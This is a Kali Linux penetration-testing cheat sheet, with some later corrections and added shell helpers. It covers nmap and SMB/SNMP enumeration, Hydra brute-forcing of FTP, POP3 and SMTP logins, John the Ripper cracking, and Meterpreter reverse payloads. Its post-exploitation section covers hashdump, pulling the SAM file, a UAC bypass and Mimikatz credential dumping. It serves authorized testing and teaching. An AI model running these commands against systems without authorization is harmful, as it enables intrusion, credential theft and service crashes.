Kali Linux Tutorials 2023


Kali Linux is the most advanced Penetration Testing Distribution platform.

Kali Linux is an open-source, Debian-based Linux distribution geared towards various information security tasks, such as Penetration Testing, Security Research, Computer Forensics and Reverse Engineering. It is maintained and funded by Offensive Security Ltd.

Kali Linux is pre-installed with more than 600 penetration-testing programs, including nmap (a port scanner), Wireshark (a packet analyzer), John the Ripper (a password cracker), Aircrack-ng (a software suite for penetration-testing wireless LANs), Burp Suite and OWASP ZAP (both web application security scanners).


Kali Linux can run natively when installed on a computer's hard disk, can be booted from a live USB, or it can run within a virtual machine. It is a supported platform of the Metasploit Project's Metasploit Framework, a tool for developing and executing security exploits.


NMAP Commands

Nmap (“Network Mapper”) is a free and open source utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.


Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.

It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X.

Command – Description

  • nmap -v -sS -A -T4 target – Verbose SYN ("stealth") scan with T4 timing (fine on a LAN), OS and service version detection, traceroute and the default scripts run against discovered services
  • nmap -v -sS -p- -A -T4 target – As above but scans all 65535 TCP ports (takes a lot longer)
  • nmap -v -sU -sS -p- -A -T4 target – As above plus a UDP scan (takes even longer; a full UDP port range is very slow, so consider -sU --top-ports 100 first)
  • nmap -v -p 445 --script=smb-vuln-* 192.168.1.X – Run the SMB vulnerability scripts against a host. The original cheatsheet gives the older form --script=smb-check-vulns --script-args=unsafe=1; that script was split into the smb-vuln-* scripts in later Nmap releases. WARNING: some of these checks, and unsafe=1 in particular, can crash the target service
  • ls /usr/share/nmap/scripts/ | grep ftp – Search the bundled NSE scripts for a keyword

SMB enumeration

Server Message Block (SMB), one version of which was also known as the Common Internet File System (CIFS), is an application-layer network protocol mainly used to provide shared access to files, printers and serial ports, and for miscellaneous communication between nodes on a network. These commands enumerate Windows shares / Samba shares.

Command – Description

  • nbtscan 192.168.1.0/24 – Discover Windows / Samba servers on a subnet: finds MAC addresses, NetBIOS names and the client workgroup / domain
  • enum4linux -a target-ip – Do everything: runs all enumeration options (users, groups, shares, password policy, OS info, workgroup / domain) apart from dictionary-based share name guessing

Other Host Discovery

Other methods of host discovery that don't use nmap.

Command – Description

  • netdiscover -r 192.168.1.0/24 – Discovers IP, MAC address and MAC vendor on the subnet from ARP; helpful for confirming you're on the right VLAN at a client site, and quieter than a port scan because it only speaks ARP

Python Local Web Server

Python local web server command, handy for serving up shells and exploits from an attacking machine.

  • python3 -m http.server 80 – Run a basic HTTP server rooted at the current directory, great for serving up shells etc. The Python 2 form, python -m SimpleHTTPServer 80, no longer works on current Kali, which ships Python 3. Binding port 80 needs root (use a high port such as 8000 otherwise), and the server offers every file in that directory to anyone who can reach it, so run it from a directory that holds only what you intend to serve

Mounting File Shares

How to mount NFS / CIFS, Windows and Linux file shares.

  • mount 192.168.1.1:/vol/share /mnt/nfs – Mount an NFS share at /mnt/nfs
  • mount -t cifs -o username=user,password=pass,domain=blah //192.168.1.X/share-name /mnt/cifs – Mount a Windows CIFS / SMB share on Linux at /mnt/cifs. If you omit password= it will prompt on the CLI, which is more secure because the password will not end up in .bash_history (mount.cifs also accepts credentials=/path/to/file, a root-only file holding username=, password= and domain= lines, which keeps the password out of ps output as well)
  • net use Z: \\win-server\share password /user:domain\janedoe /savecred /persistent:no – Mount a Windows share on Windows from the command line
  • apt-get install smb4k -y – Install smb4k on Kali, a useful Linux GUI for browsing SMB shares
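As an added example (not from the original cheatsheet): a small POSIX shell helper that writes a mount.cifs credentials file with mode 0600 and mounts with credentials= so the password never appears on the command line, in shell history or in ps output. The share path, mount point, account names and the vers=3.0 option are assumptions for illustration.

```shell
#!/bin/sh
# Added example, not part of the original cheatsheet.
# Keeps SMB credentials out of `ps`, shell history and mount output by
# putting them in a root-only file and mounting with credentials=.

# write_smb_creds FILE USER PASSWORD DOMAIN
# Creates FILE with mode 0600 in the key=value format mount.cifs expects.
write_smb_creds() {
  file=$1 user=$2 pass=$3 domain=$4
  # The subshell limits the umask change to this one file.
  ( umask 077
    printf 'username=%s\npassword=%s\ndomain=%s\n' "$user" "$pass" "$domain" > "$file"
  )
}

# smb_creds_mode FILE
# Prints the permission string (e.g. -rw-------) so a caller can verify that
# no other local user on the attacking box can read the password.
smb_creds_mode() {
  ls -ld "$1" | cut -c1-10
}

# mount_cifs_with_creds //server/share MOUNTPOINT CREDS_FILE
# Assumed option: vers=3.0 forces SMB3 and refuses to fall back to SMB1.
mount_cifs_with_creds() {
  mount -t cifs -o "credentials=$3,vers=3.0" "$1" "$2"
}

# Usage (the mount itself needs root; all values are constructed):
#   write_smb_creds /root/.smbcreds janedoe 'S3cret!' CORP
#   mkdir -p /mnt/cifs
#   mount_cifs_with_creds //192.168.1.X/share-name /mnt/cifs /root/.smbcreds
```

The credentials file is still a plaintext secret on disk; delete it when the engagement ends, and never commit it alongside your notes.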

Basic FingerPrinting

A device fingerprint or machine fingerprint or browser fingerprint is information collected about a remote computing device for the purpose of identification. Fingerprints can be used to fully or partially identify individual users or devices even when cookies are turned off.

SNMP Enumeration

SNMP enumeration is the process of using SNMP, typically with a guessable read community string such as public, to pull information from a target: user accounts, running processes, installed software, routing and ARP tables, and so on. SNMP employs two major types of software components for communication: the SNMP agent, which is located on the networking device, and the SNMP management station, which communicates with the agent.

DNS Zone Transfers

  • nslookup -> server ns1.blah.com -> set type=any -> ls -d blah.com – Windows DNS zone transfer (ls -d requests an AXFR from the currently selected server, so point nslookup at an authoritative name server first)
  • dig axfr blah.com @ns1.blah.com – Linux DNS zone transfer. Try every server listed by dig +short NS blah.com: secondaries are often configured differently from the primary and one of them may allow the transfer
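The "ask every NS" check from the bullet above, as an added example (not from the original cheatsheet). axfr_ok reads dig output and decides whether a full zone came back; axfr_all_ns wraps it around dig for a real domain. The sample records for blah.com are constructed so the parser can be exercised offline.

```shell
#!/bin/sh
# Added example, not part of the original cheatsheet.
# Zone transfers are often permitted on only one of a domain's name servers,
# so attempt AXFR against every authoritative NS, not just ns1.

# axfr_ok  (reads `dig axfr` output on stdin)
# A complete transfer begins and ends with the zone's SOA record, so two SOA
# answer lines mean the server handed over the zone. "; Transfer failed." or
# an empty answer means it refused.
axfr_ok() {
  awk '$4 == "SOA" { soa++ } END { exit (soa >= 2) ? 0 : 1 }'
}

# axfr_all_ns DOMAIN
# Looks up the NS records, then attempts AXFR against each server in turn.
axfr_all_ns() {
  domain=$1
  for ns in $(dig +short NS "$domain"); do
    if dig +noall +answer axfr "$domain" "@$ns" | axfr_ok; then
      echo "$ns allowed a zone transfer of $domain"
    else
      echo "$ns refused"
    fi
  done
}

# Constructed dig output for testing the parser offline (blah.com is the
# cheatsheet's placeholder domain; the records are made up).
sample_axfr_allowed() {
  printf 'blah.com.\t3600\tIN\tSOA\tns1.blah.com. hostmaster.blah.com. 2023010101 3600 600 86400 300\n'
  printf 'blah.com.\t3600\tIN\tNS\tns1.blah.com.\n'
  printf 'www.blah.com.\t3600\tIN\tA\t192.0.2.10\n'
  printf 'blah.com.\t3600\tIN\tSOA\tns1.blah.com. hostmaster.blah.com. 2023010101 3600 600 86400 300\n'
}
sample_axfr_refused() {
  printf '; Transfer failed.\n'
}

# Usage against a real domain: axfr_all_ns blah.com
```

A single SOA line without the closing one means the transfer was cut off, so it is treated as a failure rather than a partial success.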

DNSRecon

DNSRecon provides the ability to perform:

  1. Check all NS records for zone transfers
  2. Enumerate general DNS records for a given domain (MX, SOA, NS, A, AAAA, SPF and TXT)
  3. Perform common SRV record enumeration
  4. Top Level Domain (TLD) expansion
  5. Check for wildcard resolution
  6. Brute force subdomain and host A and AAAA records given a domain and a wordlist
  7. Perform a PTR record lookup for a given IP range or CIDR
  8. Check a DNS server's cached records for A, AAAA and CNAME records, given a list of host records in a text file
  9. Enumerate common mDNS records on the local network
  10. Enumerate hosts and subdomains using Google

HTTP / HTTPS Webserver Enumeration

  • nikto -h 192.168.1.1 – Run a Nikto web server scan against the target
  • dirbuster – Configure via the GUI; the CLI input doesn't work most of the time

Packet Inspection

  • tcpdump -i eth0 -w output.pcap tcp port 80 – tcpdump for port 80 on interface eth0, written to output.pcap (options must come before the filter expression, otherwise tcpdump tries to parse -w as part of the filter)

Username Enumeration

Some techniques used to remotely enumerate users on a target system.

SMB User Enumeration

  • python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX – Enumerate users from SMB over the SAMR named pipe. On current Kali the Impacket examples are installed as commands, so the same call is impacket-samrdump 192.168.XXX.XXX
  • ridenum.py 192.168.XXX.XXX 500 50000 dict.txt – RID cycling over SMB: enumerate users by looking up RIDs 500 to 50000 through a null session (dict.txt is the optional wordlist argument)

SNMP User Enumeration

  • snmpwalk -c public -v1 192.168.X.XXX 1.3.6.1.4.1.77.1.2.25 | cut -d" " -f4 – Enumerate users from SNMP: walk the LanManager user table (OID 1.3.6.1.4.1.77.1.2.25) with the public community string and keep only the value column. The original form walked the whole tree (OID 1) and grepped for 77.1.2.25, which works but is far slower
  • python /usr/share/doc/python-impacket-doc/examples/samrdump.py SNMP 192.168.X.XXX – Listed in the original cheatsheet under SNMP user enumeration; samrdump is an SMB/SAMR tool, so use the snmpwalk line above when SNMP is the only thing exposed
  • nmap -sU -p 161 192.168.X.XXX/24 -oG snmp_results.txt (then grep) – Search for SNMP servers with nmap, grepable output. SNMP listens on UDP 161, so the -sT (TCP connect) scan given in the original cheatsheet will not find it; expect "open|filtered" for UDP ports that never answer, and confirm those with snmpwalk
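The "then grep" step from the nmap line above, as an added example (not from the original cheatsheet): an awk-based parser for nmap's grepable (-oG) format that turns a UDP 161 sweep into a list of hosts worth feeding to snmpwalk, including the open|filtered state that UDP scans report when a port never answers. The sample scan output is constructed.

```shell
#!/bin/sh
# Added example, not part of the original cheatsheet.
# Pulls hosts with a given port open out of nmap grepable (-oG) output.
# Handles the "open|filtered" state UDP scans report when a port never
# answers, since those hosts still need a real SNMP query to confirm.

# open_hosts PORT [FILE...]
# Prints "IP STATE" for every host whose PORT is open or open|filtered.
# With no FILE it reads stdin, so it can sit at the end of a pipeline.
open_hosts() {
  port=$1; shift
  awk -v port="$port" '
    /^Host:/ && /Ports:/ {
      # -oG fields are tab separated: Host: ... \t Ports: ... \t Ignored State: ...
      n = split($0, field, "\t"); ports = ""
      for (i = 1; i <= n; i++)
        if (field[i] ~ /^Ports:/) ports = substr(field[i], 8)
      # each entry is port/state/proto/owner/service/rpc/version/
      m = split(ports, entry, ", ")
      for (j = 1; j <= m; j++) {
        split(entry[j], part, "/")
        if (part[1] == port && part[2] ~ /^open/) { print $2, part[2]; break }
      }
    }' "$@"
}

# Constructed -oG output standing in for snmp_results.txt.
sample_gnmap() {
  printf '# Nmap 7.94 scan initiated (constructed sample)\n'
  printf 'Host: 192.168.1.10 ()\tStatus: Up\n'
  printf 'Host: 192.168.1.10 ()\tPorts: 161/open/udp//snmp///\tIgnored State: closed (0)\n'
  printf 'Host: 192.168.1.11 ()\tPorts: 161/closed/udp//snmp///\n'
  printf 'Host: 192.168.1.12 ()\tPorts: 161/open|filtered/udp//snmp///\n'
  printf 'Host: 192.168.1.13 ()\tPorts: 161/filtered/udp//snmp///, 80/open/tcp//http///\n'
  printf '# Nmap done (constructed sample)\n'
}

# Usage after a real scan:
#   nmap -sU -p 161 192.168.X.0/24 -oG snmp_results.txt
#   open_hosts 161 snmp_results.txt
# Offline, on the constructed sample:
#   sample_gnmap | open_hosts 161
```

The state is printed alongside the address so that confirmed "open" hosts can be prioritised over "open|filtered" ones, which may simply be filtered by a firewall.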

Passwords

Wordlists

  • /usr/share/wordlists – Linux word lists on Kali (rockyou.txt ships compressed; run gunzip /usr/share/wordlists/rockyou.txt.gz before first use)

Brute Forcing Services

Hydra FTP Brute Force

Hydra is a parallelized login cracker that supports numerous protocols. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely. On Ubuntu it can be installed from the Synaptic package manager; on Kali Linux it is pre-installed. Before pointing it at a production service, check the account lockout policy: a handful of wrong guesses per account can lock out every user you try.

  • hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 192.168.X.XXX ftp -V – Hydra FTP brute force (-l single username, -P password list, -f stop after the first valid pair, -V show every attempt)

Hydra POP3 Brute Force

  • hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 192.168.X.XXX pop3 -V – Hydra POP3 brute force

Hydra SMTP Brute Force

  • hydra -l USERNAME -P /usr/share/wordlists/nmap.lst 192.168.X.XXX smtp -V – Hydra SMTP brute force (the original cheatsheet omits -l; Hydra refuses to run without a username via -l or a user list via -L)
  Use -t to limit concurrent connections, for example -t 15 (the default is 16; fewer tasks are gentler on the target and less likely to trip rate limiting or lockouts)

Password Cracking

John The Ripper – JTR

John the Ripper is different from tools like Hydra. Hydra does online brute-forcing by trying username/password combinations against a service daemon such as an FTP or Telnet server. John works offline and needs the hash first, so the greater challenge for an attacker is obtaining the hash that is to be cracked.

Unsalted hashes of common words are also easy to crack with free online lookup services: submit the hash and, if it is the hash of a common word, the site returns the word almost instantly. Such services are backed by large tables of precomputed hashes (or rainbow tables, which trade storage for computation); the larger the table, the more words it covers. Properly salted hashes defeat precomputed tables, which is why John computes candidate hashes itself.

  • john --wordlist=/usr/share/wordlists/rockyou.txt hashes – JTR wordlist cracking
  • john --format=descrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt – JTR cracking with the hash format forced to descrypt (traditional DES crypt(3)) and a wordlist
  • john --format=descrypt hash – JTR forced descrypt cracking without a wordlist, so John runs its default modes in order: single crack, its built-in wordlist, then incremental brute force
  • john --show hash – Display the passwords John has already cracked for the hashes in that file (read from its pot file); --show does not crack anything, so the original "--show brute force" description was wrong

Meterpreter Payloads

  • Windows reverse Meterpreter payload: set payload windows/meterpreter/reverse_tcp – Windows reverse TCP Meterpreter payload
  • Windows VNC payload: set payload windows/vncinject/reverse_tcp – Windows reverse TCP VNC injection payload (the original cheatsheet lists this entry without a payload name; this is Metasploit's VNC payload, which is not a Meterpreter payload strictly speaking)

Meterpreter Cheat Sheet

Useful meterpreter commands.

  • upload file c:\\windows – Meterpreter: upload a file to the Windows target (inside Meterpreter, backslashes in Windows paths must be doubled or the path quoted)
  • download c:\\windows\\repair\\sam /tmp – Meterpreter: download a file from the Windows target
  • execute -f c:\\windows\\temp\\exploit.exe – Meterpreter: run an .exe on the target, handy for executing uploaded exploits
  • execute -f cmd -c – Creates a new channel with a cmd shell
  • ps – Meterpreter: show processes
  • shell – Meterpreter: get a shell on the target
  • getsystem – Meterpreter: attempts privilege escalation on the target
  • hashdump – Meterpreter: attempts to dump the password hashes on the target (needs SYSTEM privileges)
  • portfwd add -l 3389 -p 3389 -r target – Meterpreter: create a port forward through the session (local port 3389 to target port 3389)
  • portfwd delete -l 3389 -p 3389 -r target – Meterpreter: delete the port forward

Common Metasploit Modules

Local Windows Metasploit Modules (exploits)

  • use exploit/windows/local/bypassuac – Bypass UAC on Windows 7 and later; set the target and the architecture (x86/x64) to match the existing session

Auxiliary Metasploit Modules

  • use auxiliary/scanner/http/dir_scanner – Metasploit HTTP directory scanner
  • use auxiliary/scanner/http/jboss_vulnscan – Metasploit JBoss vulnerability scanner
  • use auxiliary/scanner/mssql/mssql_login – Metasploit MSSQL credential scanner
  • use auxiliary/scanner/mysql/mysql_version – Metasploit MySQL version scanner
  • use auxiliary/scanner/oracle/oracle_login – Metasploit Oracle login module

Metasploit PowerShell Modules

  • use exploit/multi/script/web_delivery – Metasploit PowerShell payload delivery module
  • use post/windows/manage/powershell/exec_powershell – Metasploit: upload and run a PowerShell script through a session
  • use exploit/multi/http/jboss_maindeployer – Metasploit JBoss deploy
  • use exploit/windows/mssql/mssql_payload – Metasploit MSSQL payload

Post Exploit Windows Metasploit Modules

  • run post/windows/gather/win_privs – Metasploit: show privileges of the current user
  • use post/windows/gather/credentials/gpp – Metasploit: grab passwords saved in Group Policy Preferences (the cpassword attribute)
  • load mimikatz -> wdigest – Metasploit: load the Mimikatz extension and dump WDigest clear-text credentials. The mimikatz extension has been replaced by kiwi in current Metasploit: load kiwi -> creds_wdigest. On current Windows versions WDigest caching is disabled by default, so expect nothing unless UseLogonCredential has been enabled
  • run post/windows/gather/local_admin_search_enum – Identify other machines the supplied domain user has administrative access to

Amap

Amap attempts to identify applications even when they run on a port other than the usual one, and it also identifies non-ASCII based applications. This is achieved by sending trigger packets and looking up the responses in a list of response strings.

(c) hackersonlineclub
